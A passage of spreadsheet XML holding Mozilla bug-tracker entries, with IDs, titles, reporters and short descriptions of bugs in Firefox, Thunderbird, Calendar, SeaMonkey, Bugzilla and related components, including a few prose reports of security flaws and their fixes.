where %1 and %2 are substitued for ordinal.name.XXX and day.XXX.name we can only get one form while at least two (or more for languages other than Polish) are needed.
For example:
recurNthWeek=%1$S %2$S miesiaca
for number 1 gives us:
Mon: Pierwszy poniedzialek miesiaca - CORRECT
Tue: Pierwszy wtorek miesiaca  - CORRECT
Wed: Pierwszy sroda miesiaca - INCORRECT (should be: Pierwsza sroda miesiaca)
Thu: Pierwszy czwartek miesiaca  - CORRECT
Fri: Pierwszy piatek miesiaca  - CORRECT
Sat: Pierwszy sobota miesiaca - INCORRECT (should be: Pierwsza sobota miesiaca)
Sun: Pierwszy niedziela miesiaca - INCORRECT (should be: Pierwsza niedziela miesiaca)
Languages that are suffering from this may include all Slavic languages (pl cs sk ru etc.) and probably others.</t>
  </si>
  <si>
    <t>marcoos+bmo</t>
  </si>
  <si>
    <t>CORE-256734</t>
  </si>
  <si>
    <t>Some DOM classes use the wrong macro to define their prototype chain</t>
  </si>
  <si>
    <t>SEAMONKEY-359213</t>
  </si>
  <si>
    <t>Allow Popups from This site doesn't get currentURI</t>
  </si>
  <si>
    <t>SeaMonkey recent branch build (should happen on trunk as well)
Steps to reproduce:
1) Set your prefs to block popups
2) Go to an url
3) Tools --&gt; Popup Manager: Allow Popups from This Site
--&gt; Popup manager opens without the sites url in the field - and a js error appears in the console:
Warning: assignment to undeclared variable host
Source File: chrome://communicator/content/permissions/permissionsNavigatorOverlay.xul
Line: 187
Looking at the code it seems that the uri is stored in a variable that is undeclared and never returned.
Patch in a few seconds...</t>
  </si>
  <si>
    <t>SEAMONKEY-241288</t>
  </si>
  <si>
    <t>installer and browser files not stripped in installer build</t>
  </si>
  <si>
    <t>today's linux build from the 1.7 branch
(mozilla-i686-pc-linux-gnu-1.7rc1-installer.tar.gz) is 15467852 bytes
today's nightly build from the trunk
(mozilla-i686-pc-linux-gnu-full-installer.tar.gz) is 12677202 bytes
part of the difference is talkback which accounts for 800KB on the branch and
is still missing on the trunk.  negotiate-auth and tasks extensions are built on
trunk and not on the branch.
The big difference is that the files that go into browser.xpi are not being
stripped (browser.xpi itself is ~1MB larger on the branch than the trunk). 
Files going into other .xpi (such as mail.xpi) are being stripped properly.
The rest is from the installer itself (mozilla-installer-bin) which is not
being stripped on the branch.  The stub installer does seem to be stripped as
the files on the ftp site are similar in size.</t>
  </si>
  <si>
    <t>BUGZILLA-191034</t>
  </si>
  <si>
    <t>Refactor Installation chapter</t>
  </si>
  <si>
    <t>The Step-by-step section should be as generic as possible.  Currently there's
hints in there about using utilites on Mandrake some redundant instructions
about configuring MySQL etc.
What I'm currently working on is making Installation basically be:
4. Installation
  4.1 Step by step
  4.2 Optional
  4.3 OS Specific (This will house win32 osx etc. hints)
  4.4 http server (hints for securing Apache IIS AOL Server etc.)
  4.5 Troubleshooting
Once we support more than just MySQL on the backend Database Server can be
inserted as 4.5.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-925806</t>
  </si>
  <si>
    <t>Gaia::Everything.me</t>
  </si>
  <si>
    <t>Marketplace integration in e.me search results needs to open marketplace suggestions in the marketplace app not the browser</t>
  </si>
  <si>
    <t>If a user selects a marketplace suggestion in the search results it needs to open in the marketplace app using a web activity not the browser.
* If an app is selected then the app details page for that app should be displayed in the marketplace via a web activity
* If download more apps is selected then the search results with e.me search term should be displayed in marketplace via a web activity</t>
  </si>
  <si>
    <t>ran</t>
  </si>
  <si>
    <t>jsmith</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-337943</t>
  </si>
  <si>
    <t>Remove nsIAbCard::cardType and nsIAbCard::defaultEmail</t>
  </si>
  <si>
    <t>nsIAbCard.idl defines the following:
%{C++
// Constants used for default email.
// 0: screen name 1: other email #1 2: other email #2
#define AB_DEFAULT_EMAIL_IS_SCREEN_NAME 0
#define AB_DEFAULT_EMAIL_IS_EMAIL_1     1
#define AB_DEFAULT_EMAIL_IS_EMAIL_2     2
// Constants used for card types.
//  or 0: normal 1: AOL groups 2: AOL additional email address
#define AB_CARD_IS_NORMAL_CARD            0
#define AB_CARD_IS_AOL_GROUPS             1
#define AB_CARD_IS_AOL_ADDITIONAL_EMAIL   2
%}
interface nsIAbCard : nsISupports {
...
  attribute wstring defaultEmail
  attribute wstring cardType
...
}
Looking at the lxr searches:
http://lxr.mozilla.org/seamonkey/search?string=defaultEmail
and
http://lxr.mozilla.org/seamonkey/search?string=cardType
these two fields don't appear to be really used anywhere - the functions for getting and setting them are there but that's about it from what I can see.
Default email could be used in theory however if we were to support &gt; 2 email addresses then it would be a int or some other value that would be more flexible than the definition above.
Card Type I don't think should be distingished at the top level into AOL and non-AOL specific types. Additionally its kind of limited to one implementation/provider that way.
Therefore I think I'd like to remove these two and the associated code. David Dan or anyone else any comments?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-377622</t>
  </si>
  <si>
    <t>Remove palm sync time stamp and category id from ab code.</t>
  </si>
  <si>
    <t>CALENDAR-477009</t>
  </si>
  <si>
    <t>Unable to get directory path for directories immediately under some symlinks</t>
  </si>
  <si>
    <t>Created attachment 360675
patch rev1
Sunbird spinoff of bug 476106</t>
  </si>
  <si>
    <t>FIREFOX-352244</t>
  </si>
  <si>
    <t>don't override border on toolbarbuttons (restore bevel when using Classic)</t>
  </si>
  <si>
    <t>Bug 348442 restored the -moz-appearance styling which restored the native hover/active effects (bevel) for the themed cases (Luna) but didn't remove the explicit border overriding so Classic users still don't have native bevels.</t>
  </si>
  <si>
    <t>CALENDAR-231129</t>
  </si>
  <si>
    <t>linked version doesnÂ´t work for latest Thunderbird nightly (20040113)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7a) Gecko/20040110 Firebird/0.8.0+ (Oxs G7 SSE optimized)
Build Identifier: Mozilla Thunderbird 0.5a (20040113) | Mozilla Calendar 2004010914-cal
The Calendar build for Thunderbird linked on the Project Page
(http://www.oeone.net/mostafah2/calendar_windows_20040109.xpi)
does not work for latest Thunderbird nightly (20040113)
though the build for Mozilla 1.5 (Thunderbird
0.3)(http://www.oeone.net/mostafah2/calendar_windows_1.5_20040109.xpi)
works for me its only a little slow sometimes.
Reproducible: Always
Steps to Reproduce:
1.Install latest Thunderbird nightly
2.install Calendar for thunderbird 0.4
3.
Actual Results:  
Calendar does not work
Expected Results:  
Calendar should work
did someone mixed up the links?</t>
  </si>
  <si>
    <t>n.seyer</t>
  </si>
  <si>
    <t>SEAMONKEY-105994</t>
  </si>
  <si>
    <t>fix several cvs warnings with .cvsignore</t>
  </si>
  <si>
    <t>A sh script to add/update .cvsignore files will be attached.</t>
  </si>
  <si>
    <t>lpham</t>
  </si>
  <si>
    <t>simmo</t>
  </si>
  <si>
    <t>CORE-378695</t>
  </si>
  <si>
    <t>SetupClusterBoundaries in gfxPangoFonts.cpp misinterprets attrs from pango_break</t>
  </si>
  <si>
    <t>Created attachment 262718
patch to SetupClusterBoundaries
SetupClusterBoundaries in gfxPangoFonts.cpp expects the pango_break argument
attrs to have one PangoLogAttr per UTF8 byte but pango_break sets one
PangoLogAttr per (unicode) character.
I checked the pango_break behaviour in the source code and in its runtime output.
pango_default_break in pango-1.16.2/pango/break.c uses g_utf8_next_char to
increment the text pointer each iteration but ++ to increment the index into
attrs.  (Similarly tailor_segment uses g_utf8_strlen.)
The attached patch corrects SetupClusterBoundaries.
I haven't noticed any side effects from the misinterpretation of the data at
least partially because Bug #332739 is not yet implemented.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-385241</t>
  </si>
  <si>
    <t>Disable libxul for debug builds</t>
  </si>
  <si>
    <t>Per the conversation at the 1.9 meeting a week ago</t>
  </si>
  <si>
    <t>CORE-324939</t>
  </si>
  <si>
    <t>--disable-activex-scripting does two different things</t>
  </si>
  <si>
    <t>The --disable-activex-scripting flag does two completely different things: it disables the IDispatch support in xpconnect and it disables the activex plugin. The ActiveX plugin is not going to be shipped by gecko but we do want to continue shipping the xpconnect idispatch support. So I'm separating the configure flags.</t>
  </si>
  <si>
    <t>CORE-23606</t>
  </si>
  <si>
    <t>Sidebar shows incorrect cursor</t>
  </si>
  <si>
    <t>The title display of the sidebar you know it has customize button and My
Panels displays the resize cursor for the entire header of the sidebar.  It
should show the default curser for the button at least.
It is easy to fix.  Change:
splitter.sidebar-main-header titledbutton {
  padding: 0px
}
to
splitter.sidebar-main-header titledbutton {
  padding: 0px
  cursor: default
}</t>
  </si>
  <si>
    <t>tekhir</t>
  </si>
  <si>
    <t>TOOLKIT-430852</t>
  </si>
  <si>
    <t>add attribute to restore treelines on XUL trees (treelines missing in MailNews)</t>
  </si>
  <si>
    <t>With bug 425131 fixed both Windows and Linux are missing treelines in trees in Classic. This is (a) violating the respective OS settings and (b) a real PITA when reading threaded mailing lists or usenet.
The fix was in global so maybe we need a respective rule in communicator or messenger. Maybe we can work out a fix for both SM and TB if they're interested?</t>
  </si>
  <si>
    <t>CORE-328930</t>
  </si>
  <si>
    <t>implement safari-style residual style handling</t>
  </si>
  <si>
    <t>We need to implement Safari-style residual style handling in order to make our DOM deterministic irrespective of network packet boundaries.
(filed by dictation for shaver)</t>
  </si>
  <si>
    <t>CALENDAR-329817</t>
  </si>
  <si>
    <t>events do not have calendar colors. only blue.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: thunderbird version 1.5 (20051201) - lighting build 2006030708
color coding for the calendar is no working. all the events are blue and all of the calendar names listed are black (blue BG when selected). 
with colored events will the border be a dark sade of the color and the event be a light shade? So an event can be light red with a dark red border.
Reproducible: Always
Steps to Reproduce:
1.creating multiple events and calendars wit different colors.
2.
3.
Actual Results:  
events are blue with a darker blue border.
Expected Results:  
an event can be light red with a dark red border. then when selected it can be all light red (border and event) or all dark red with white text.
OSX 10.4</t>
  </si>
  <si>
    <t>Kenton.rogers</t>
  </si>
  <si>
    <t>MOZILLA.ORG-296508</t>
  </si>
  <si>
    <t>Licensing</t>
  </si>
  <si>
    <t>mozilla.org site copyright issue</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Noticed today that the mozilla.org copyright is currently in the footer as being
assigned to The Mozilla Organization which as I understand it is not a
legally defined entity.
Reproducible: Always</t>
  </si>
  <si>
    <t>WEBSITES-425986</t>
  </si>
  <si>
    <t>I did not mean to show my meat to all of planet</t>
  </si>
  <si>
    <t>Please change my RSS feed from its current ancient value (which I think goes through no fewer than 4 internal rewrites!) to
http://shaver.off.net/diary/tag/mozilla/feed
Thanks!</t>
  </si>
  <si>
    <t>CORE-458493</t>
  </si>
  <si>
    <t>Crash [@ nsSVGEffects::RemoveRenderingObserver]</t>
  </si>
  <si>
    <t>Created attachment 341738
testcase (crashes Firefox when loaded)
Crash [@ nsSVGEffects::RemoveRenderingObserver]</t>
  </si>
  <si>
    <t>FIREFOX-415043</t>
  </si>
  <si>
    <t>dragging many bookmarks duplicates them and mix up selection (but on folder change they are correct)</t>
  </si>
  <si>
    <t>Created attachment 300620
patch
While working on selection i found this:
STR:
- open the Library and go to a folder in the bookmarks menu
- suppose you have bookmarks abcdefghi
- select bc and drag them between f and g
- you end up with acefbcghi and selection is messed up
- if you change folder and come back the results are correct
this is mostly an itemMoved problem
this should be blocking makes reordering bookmarks an hell
i've tested this patch and it's working fine with bookmarks and folders (open and closed).
notice that the problem is visible in library but could be also in bookmarks sidebar</t>
  </si>
  <si>
    <t>THUNDERBIRD-317589</t>
  </si>
  <si>
    <t>Mail body contains ++ produces error message</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Thunderbird version 1.6a1 (20051123)
A mail message that begins with the following body text (output from a cron job)
+ + date +%m%d%y-%H%M
DATE=112105-0115
+ cd /usr/common/usg/ipm/sql/
+ [ -a ipm.all.sql ]
+ mv ipm.all.sql ipm.all.sql.112105-0115
+ /usr/common/usg/ipm/scripts/ipm_sql all
+ + whoami
USER=ragerber
+ EXENAME=/usr/common/usg/ipm/scripts/ipm_parse
+ [ -n all ]
+ USER=all
+ CTIME=
+ UOUT=all
+ [ all = all ]
+ USER=[a-z]*
+ CTIME=-ctime -1
+ UOUT=all
+ + pwd
generates the following to STDERR (? appears in the shell from which it was
started)
/desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
over and over....
Reproducible: Always
Steps to Reproduce:
1.Click on email subject in main mail window
2.check output generated in shell from which thunderbird was launched
3.
Actual Results:  
/desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+01/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+01/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+01/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+01/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+01/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
GConf Error: Bad key or directory name:
 /desktop/gnome/url-handlers/e+03/command: `+' is an invalid character in key/directory names
Expected Results:  
Nothing.
I don't see any functionality problems but could potentially cause errors?</t>
  </si>
  <si>
    <t>TOOLKIT-432490</t>
  </si>
  <si>
    <t>safebrowsing server returning 400s frequently</t>
  </si>
  <si>
    <t>With the new safebrowsing server 400s are happening on redirects quite often.  I don't see a real pattern yet but I am getting a 400 at some point in almost every initial update.</t>
  </si>
  <si>
    <t>WEBSITES-556956</t>
  </si>
  <si>
    <t>Syndicate blog to Planet</t>
  </si>
  <si>
    <t>Please syndicate my blog to Planet
http://ejsf22.wordpress.com/</t>
  </si>
  <si>
    <t>ej</t>
  </si>
  <si>
    <t>CORE-52541</t>
  </si>
  <si>
    <t>Link dragging no longer working</t>
  </si>
  <si>
    <t>Build ID: 2000091308
Steps to Reproduce:
(1) Go to any site in the browser.
(2) Try to drag a link
The drag is never initiated apparently (judging from the lack of cursor 
feedback...)</t>
  </si>
  <si>
    <t>CORE-273235</t>
  </si>
  <si>
    <t>Support XML Events also in SVG</t>
  </si>
  <si>
    <t>patch coming</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-212322</t>
  </si>
  <si>
    <t>GFX: BeOS</t>
  </si>
  <si>
    <t>warning: control reaches end of non-void function `nsDrawingSurfaceBeOS::Unlock()'</t>
  </si>
  <si>
    <t>/swap/BEOS/mozilla/gfx/src/beos/nsDrawingSurfaceBeOS.cpp: In method `nsresult nsDrawingSurfaceBeOS::Unlock()':
/swap/BEOS/mozilla/gfx/src/beos/nsDrawingSurfaceBeOS.cpp:159: warning: control reaches end of non-void function `nsDrawingSurfaceBeOS::Unlock()'</t>
  </si>
  <si>
    <t>CALENDAR-452381</t>
  </si>
  <si>
    <t>Don't pass strings to setTimeout</t>
  </si>
  <si>
    <t>Clone of bug 431978 for Calendar:
As pretty much every guide to either efficient or secure JavaScript says
setTimeout(foopy() 0) is almost never what you want to do.</t>
  </si>
  <si>
    <t>BUGZILLA-365352</t>
  </si>
  <si>
    <t>Lists of bugs (a.k.a tags) may be overwritten or deleted when tagging a new bug</t>
  </si>
  <si>
    <t>No idea what happened but I just realized that some of my lists of bugs have been deleted and replaced by the bug I just tagged. I lost all my lists on b.m.o and I can reproduce the bug locally. :(
I'm pretty sure this is a regression. I'll investigate. But as this is dataloss (I now use tags instead of CC'ing me all the time) we should block 3.0 on it.</t>
  </si>
  <si>
    <t>TESTOPIA-379496</t>
  </si>
  <si>
    <t>Test Plans</t>
  </si>
  <si>
    <t>taint issue in Bugzilla::Testopia::Search</t>
  </si>
  <si>
    <t>Created attachment 263498
patch v1
Around line 1055 the author manager etc... are not detained and PostgreSQL complains.</t>
  </si>
  <si>
    <t>SEAMONKEY-236140</t>
  </si>
  <si>
    <t>Startup &amp; Profiles</t>
  </si>
  <si>
    <t>profile manager conclusion sheet doesn't fit - horizontal scrollbar</t>
  </si>
  <si>
    <t>On Mac OS X the profile manager gets a horizontal scrollbar on the conclusion
sheet. I suspect the aqua buttons for choose folder... use default folder
and region selection... are the reason for the wide sheet.</t>
  </si>
  <si>
    <t>BUGZILLA-126266</t>
  </si>
  <si>
    <t>Use UTF-8 (Unicode) charset encoding for pages and email for NEW installations</t>
  </si>
  <si>
    <t>Presently the bugzilla webpages don't contain an encoding header. Neither do the
emails.
Expected:
- The HTML pages come with an encoding header such as:
- The emails come with an encoding header such as:
  MIME-version: 1.0
  Content-type: text/plain format=flowed charset=ISO-8859-1
  Content-transfer-encoding: 8BIT
Reasoning:
The encoding information makes sure that the 8bit characters are shown
correctly. I have chosen ISO-8859-1 (Latin1) since it is most spread (though not
as good as UTF8) and is the default encoding of MySQL.</t>
  </si>
  <si>
    <t>BUGZILLA-415471</t>
  </si>
  <si>
    <t>[SECURITY] A user without canconfirm privs can enter bugs in the NEW/ASSIGNED status using XML-RPC</t>
  </si>
  <si>
    <t>Bug-&gt;create() doesn't make sure that the bug status entered by the user is legal based on his privs. If votes to confirm &gt; 0 then a user with no privs cannot choose the initial bug status this one must be UNCONFIRMED. Either _check_bug_status() or create() itself should enforce this maybe using something like:
  delete $params-&gt;{bug_status} unless $user-&gt;in_group('canconfirm' $product)</t>
  </si>
  <si>
    <t>BUGZILLA-364055</t>
  </si>
  <si>
    <t>Message confusing when your version of DBD::foo is too old</t>
  </si>
  <si>
    <t>When your version of DBD::foo or MySQL/Pg is too old checksetup.pl should say require version x.xxx or later instead of require version x.xxx alone. Else one could think he really has to have this exact version installed.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-107703</t>
  </si>
  <si>
    <t>crash using dom inspector [@nsFrame::GetParentStyleContextProvider]</t>
  </si>
  <si>
    <t>Whenever I click on a box in the dom inspector I'm crashing here:
nsFrame::GetParentStyleContextProvider(nsFrame * const 0x0377de3c
nsIPresContext * 0x023b9cd8 nsIFrame * * 0x0012ac98
nsContextProviderRelationship &amp; -1023097725) line 3844 + 3 bytes
inFlasher::RepaintElement(inFlasher * const 0x04f25390 nsIDOMElement *
0x0262d45c) line 92
XPTC_InvokeByIndex(nsISupports * 0x04f25390 unsigned int 4 unsigned int 1
nsXPTCVariant * 0x0012adf4) line 154</t>
  </si>
  <si>
    <t>hewitt</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-386531</t>
  </si>
  <si>
    <t>XPCOMUtilify console command line handler</t>
  </si>
  <si>
    <t>Created attachment 270521
Patch
Note that code evaluation is broken due to 385092.</t>
  </si>
  <si>
    <t>CORE-519233</t>
  </si>
  <si>
    <t>Use JS_GetString{BytesChars}Z in ctypes</t>
  </si>
  <si>
    <t>jorendorff is adding new API functions with better error handling in bug 518463 - we should use them in ctypes.</t>
  </si>
  <si>
    <t>NSS-104741</t>
  </si>
  <si>
    <t>NSS leaks on shutdown()</t>
  </si>
  <si>
    <t>I attempted to merge the leak fixes provided by jeff@NerdOne.com (Jeff
Hostetler) into a single patch.  It did reduce the shutdown leaks I observed
from NSS by a bit (I think around 200K) although it still didn't fix the
largest leak which I'll try to file as a separate bug.  I'll attach the patch
and mark the bugs that the patch covers as depending on this one.</t>
  </si>
  <si>
    <t>CALENDAR-304084</t>
  </si>
  <si>
    <t>all day event gets changed to previous day</t>
  </si>
  <si>
    <t>If I check the All Day checkbox when creating a new event the event date gets
changed to the previous day.
Steps to Reproduce:
* double-click calendar or click New Event button to bring up dialog box
* check All Day radiobox
* click OK button.
Actual results: the event appears in the calendar on the previous day from the
date entered into the From and To text fields in the dialog box and the
edit event dialog box confirms that its date was changed to the previous day.
Expected results: event appears in the calendar on the date entered into the
From and To text fields in the dialog box.
Tested on today's nightly for Linux: Mozilla/5.0 (X11 U Linux i686 en-US
rv:1.8b4) Gecko/20050809 Mozilla Sunbird/0.2+
Note that if I subsequently edit the event correcting the date it stays
corrected.  The problem seems to only occur when creating an event.</t>
  </si>
  <si>
    <t>BUGZILLA-341285</t>
  </si>
  <si>
    <t>Update bugzilla-update.xml</t>
  </si>
  <si>
    <t>bugzilla-update.xml has to be fixed too. I will do it myself when the 2.23.2 tarball is available.
mkanat maybe should we update the release doc to mention bugzilla-update.xml too.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-529534</t>
  </si>
  <si>
    <t>[tracking] Firefox 3.6 l10n release trackers</t>
  </si>
  <si>
    <t>This is a meta bug used to track the status of Firefox 3.6 l10n release trackers.</t>
  </si>
  <si>
    <t>stas</t>
  </si>
  <si>
    <t>CORE-26644</t>
  </si>
  <si>
    <t>HR width percentage value not working in button element.</t>
  </si>
  <si>
    <t>Build: Apprunner
Version: 20000020108
Platforms: All
Expect results: The HR element should use the assigned percent value (50%) to 
rendered
inside the button element.
What I got: The HR's width is only a few pixels instead of 50 %.
Steps to reproduce:
1) Open the attached test case.
2) The HR  inside the button element is only a few pixels in width.
3) The HR  outside of the button element is using the same percent value is 
rendered at 50%.</t>
  </si>
  <si>
    <t>foss</t>
  </si>
  <si>
    <t>CORE-380962</t>
  </si>
  <si>
    <t>offsetLeft and offsetTop for table elements are too large</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070515 Minefield/3.0a5pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a5pre) Gecko/20070515 Minefield/3.0a5pre
Between the 2007-03-15-04 and 2007-03-16-05 trunk builds the offsetLeft and offsetTop calculations for tables were switched to more accurately reflect the size of the table but the offsetLeft and offsetTop for child rows and cells were not switched so they remain too large.
Reproducible: Always
Steps to Reproduce:
1. Create a table with some space between it and the top or left of its offsetParent
2. Add one row and cell to it.
2. Check the cell's offsetLeft or offsetTop.
Actual Results:  
The offsetLeft and offsetTop are calculated as if the table stretched almost to the top and left edges.
Expected Results:  
Because the table is spaced away from the edges the cell's offsetLeft and offsetTop should be smaller reporting only the space between the edge of the cell and the edge of the table.</t>
  </si>
  <si>
    <t>BUGZILLA-97868</t>
  </si>
  <si>
    <t>Rename the Edit action (for attachments) to something else</t>
  </si>
  <si>
    <t>I wonder why anyone with bug edit rights can edit patches. That's that harm the
backlog and possibly infrige the copyright even? I wouldn't want my patches to
be edited by others in a way that my opriginal patch isn't clearly seens
anymore. Using this bug to test it.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-369781</t>
  </si>
  <si>
    <t>cvs performance slower than normal</t>
  </si>
  <si>
    <t>Don't have great data for this yet but I've noticed that CVS performance has been way slower than normal lately for checkouts both from servers inside the colo and outside.
It doesn't look like a DNS problem more like SSH taking a while to connect.</t>
  </si>
  <si>
    <t>mzeier</t>
  </si>
  <si>
    <t>CORE-71144</t>
  </si>
  <si>
    <t>Outliner widget needs to set the focused property when appropriate</t>
  </si>
  <si>
    <t>We need the ability to grey out the selection when an outliner widget does not
have focus. In order to do this we need the outliner widget to set a focused
property.
Dave and I already talked about this today. This is just a tracking bug on that
issue.</t>
  </si>
  <si>
    <t>NSPR-185034</t>
  </si>
  <si>
    <t>Update symbol vector tables</t>
  </si>
  <si>
    <t>I need to update the OpenVMS symbol vector files now that Wan-Teh says the
public entry points are nailed down. He says I can find the lists of public
entry points on the NSPRPUB_RELEASE_4_1_BRANCH in the following files:
  nsprpub/pr/src/nspr.def
  nsprpub/lib/ds/plds.def
  nsprpub/lib/libc/src/plc.def
Wan-Teh I'll try to get to this next week.</t>
  </si>
  <si>
    <t>CORE-508850</t>
  </si>
  <si>
    <t>XPCOMUtils should provide a convenient way to define lazy getters</t>
  </si>
  <si>
    <t>It's a very common pattern to define lazy getters for services in component constructors like this:
http://mxr.mozilla.org/mozilla-central/source/toolkit/components/places/src/nsPlacesAutoComplete.js#247
sayrer suggested that we make this a method on XPCOMUtils so we share more code.
I'm thinking adding two methods looking something like this:
defineLazyGetter: function(aObject aName aLambda)
{
  aObject.__defineGetter__(aName function() {
    delete aObject[aName]
    return aObject[aName] = aLambda()
  })
}
defineLazyServiceGetter: function(aObject aName aContract aCID)
{
  this.defineLazyGetter(aObject aName function() {
    return Components.classes[aContract].getService(aCID)
  })
}
patch coming in a bit</t>
  </si>
  <si>
    <t>FIREFOX-513420</t>
  </si>
  <si>
    <t>Private Browsing</t>
  </si>
  <si>
    <t>browser chrome test: browser_privatebrowsing_windowtitle.js TEST-UNEXPECTED-FAIL</t>
  </si>
  <si>
    <t>Error 0 (Unknown error: 0).TEST-UNEXPECTED-FAIL | chrome://mochikit/content/browser/browser/components/privatebrowsing/test/browser/browser_privatebrowsing_windowtitle.js | The window title for about:privatebrowsing is correct (outside private browsing mode) - Got Minefield expected Would you like to start Private Browsing?
http://tinderbox.mozilla.org/showlog.cgi?log=Firefox-Unittest/1251519039.1251520845.28344.gz&amp;fulltext=1</t>
  </si>
  <si>
    <t>TOOLKIT-473444</t>
  </si>
  <si>
    <t>Help opens but with a beep with cmd+? in prefwindow without overlayed/own keys</t>
  </si>
  <si>
    <t>Created attachment 356814
demo patch
I think this is a cocoa bug but I thought it might be necessary to work around it at this stage...
STR:
1) Apply demo patch and build
2) Start Firefox and open the preference window
3) Hit cmd+?
What happens: A system beep and Help opens
What should happen: Help opens without any beep
This is not an issue in Firefox but it will be an issue for any consumer that doesn't make use of an overlay with the help keys specified in it.
One possible solution is to use preventDefault on the handler - that seems to get rid of the beep. But then there won't be any beep in a pane that lacks a help button of course.</t>
  </si>
  <si>
    <t>BUGZILLA-38859</t>
  </si>
  <si>
    <t>createaccount.cgi needs to escape untrusted value for e-mail address (but maybe de-escape @ symbol)</t>
  </si>
  <si>
    <t>tara</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-513565</t>
  </si>
  <si>
    <t>Restart openfire server</t>
  </si>
  <si>
    <t>The weekly restart didn't work right http://chat-support.mozilla.com:9091 404's. It needs to be restarted again.</t>
  </si>
  <si>
    <t>tanner.sumo.bugs</t>
  </si>
  <si>
    <t>CORE-519768</t>
  </si>
  <si>
    <t>NJ: fix lirasm test failures</t>
  </si>
  <si>
    <t>Created attachment 403821
fix the tests
I got Lirasm *building* again recently but it was failing several tests. This patch fixes them. Some params weren't being saved (ABI drift) and we were trapping an assert on the fragment profiling stuff.</t>
  </si>
  <si>
    <t>SEAMONKEY-111484</t>
  </si>
  <si>
    <t>Hide/Show platform-specific references in help files</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.6) Gecko/20011120
BuildID:    2001112011
For example can't find Personal Toolbar info as described in Help.
Reproducible: Always
Steps to Reproduce:
1.Open Help
2.
3.</t>
  </si>
  <si>
    <t>nwhiii</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-315116</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/build/sheriff/sheriff-schedule.html</t>
  </si>
  <si>
    <t>I went to .  1/4 of the way down the list is See &gt; for Mozilla's sheriff schedule.  Following the link gives me an error.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-26197</t>
  </si>
  <si>
    <t>Viewer App</t>
  </si>
  <si>
    <t>using -d option on viewer causes premature exit</t>
  </si>
  <si>
    <t>viewer looks a lot better tonight but here is one problem.
one way I typically run the viewer to look at lots of files quickly is like 
this:
    viewer -f top100.txt -d 10
what this command line does is load the url's in the file top100.txt with a 
minimum 10 second delay (longer if the file takes longer than 15 seconds to 
load.)  this lets me scan many pages quickly without having to type in any urls 
or click any links.  to run through the top 100 quickly to verify no crashes or 
asserts I use -d 0.
what I see is if I set the delay to a very small number 0 or 1 it works fine.  
if I chose a larger number like 15 viewer exits after the first url is done 
loading.
I'm pretty sure this is new.  I last remember runningn this over the weekend 
with no problem.  This is a medium priority problem and if it gets fixed in the 
next couple of days that is ok for me.  Chris?</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-463224</t>
  </si>
  <si>
    <t>Virtual Machine</t>
  </si>
  <si>
    <t>Tweaks to VMPI_alloca</t>
  </si>
  <si>
    <t>The following patch adds two big things and some small things.
One is a a facility to MMgc called 'RCRoot' which allows for explicit management of root memory that also pins RC objects.  (Rob Borcic's idea cleaned up corrected and renamed.)
The other is a facility built on top of the RCRoot facility that allows stack-like management of memory akin to alloca.  This mechanism is fast - the common case is that no new allocation or deallocation need be performed - and simple to use deallocation is taken care of by an auto_ptr like mechanism and by integration into the exception system.
The system is swappable with standard alloca() if one uses the new macro defined in avmbuild.h VMPI_alloca().  That is on systems with large stacks and working alloca() alloca() can still be used.  A new #define AVMPLUS_HEAP_ALLOCA selects the new facility.
There is a small usage guide in the patch for the file AvmCore.h.
The patch enables AVMPLUS_HEAP_ALLOCA by default since that is the most reasonable setting for smaller systems.
It is possible that this system could be factored differently right now the alloca facility is entirely within AvmCore which probably precludes its use from code outside the VM.  However as it is (and needs to be) integrated with the exception handling facilities this seemed the most natural.</t>
  </si>
  <si>
    <t>lhansen</t>
